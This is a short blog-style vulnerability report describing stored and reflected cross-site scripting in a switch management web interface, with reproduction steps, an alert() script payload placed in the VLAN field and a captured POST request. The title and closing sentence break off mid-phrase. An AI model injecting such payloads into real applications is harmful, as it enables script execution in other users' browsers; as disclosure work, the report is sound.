Stored and reflected Cross-Site Scripting in

I have found two XSS vulnerabilities in one simple process of creating a new switch interface.

Below are the details.

  1. Navigate to „Access Switches Tour” -> „Switch” -> „Configure” -> „Routing and DHCP”.
  2. Click the „Add an interface” button and fill „Name”, „Interface IP” and „DHCP server IPs” with whatever data. As the VLAN put the following payload: 1<script>alert(‚’)</script>
  3. Click the „Save” button. There will be the following POST request:
POST /Live-Demo-Switch/n/kaGejdmc/manage/nodes/update_switch_l2_dhcp_relays
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: kMHJ7LD3eYdG+QsNbr9yeJ2a+ZRiEy5g/oaYIu7Tq8k=
X-Requested-With: XMLHttpRequest
Content-Length: 232
Connection: close


Then the JavaScript code will execute (reflected XSS). It is also a stored XSS, so it will fire up everytime the user navigates to

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *